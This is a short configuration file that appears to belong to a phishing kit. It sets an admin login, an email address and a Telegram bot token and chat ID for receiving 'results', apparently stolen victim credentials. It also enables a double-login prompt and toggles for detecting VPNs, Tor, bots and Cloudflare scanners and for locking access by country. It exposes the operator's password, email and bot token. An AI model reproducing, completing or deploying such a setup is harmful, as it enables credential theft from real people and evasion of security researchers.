; .------..------.

; Admin Panel Login
; Options: credentials

Username = "OKORO"
Password = "astute09"

; Your email for results
; Options: email address

Email = "OKORO@yandex.com"

; Dont touch this

LoginTwice = "on"

; Whitelist your IP
; Use a VPN / Proxy !
; Options: IP or off

showCode = "off"

MyIP = "10.0.2.15"

; Proxy, Hosting, Tor detection
; Options: on or off

VPN = "off"

; Proxy, Hosting, Tor detection
; Not 100% reliable though
; Options: on or off

HeuristicVPN = "off"

; Special "cloudflare" protection
; will block 99% of bots in theory
; Options: on or off

CFProtection = "on"

; Allow access to a specific country
; Options: country code or off

CountryLock = "off"


;For telegram results added by Astute
;Telegram added
telegram = "on"
chat_id = "5947321549"
bot_url = "6616392346:AAGZrG6HBhVvJrjnoW31adgc3yagdSZX_M"

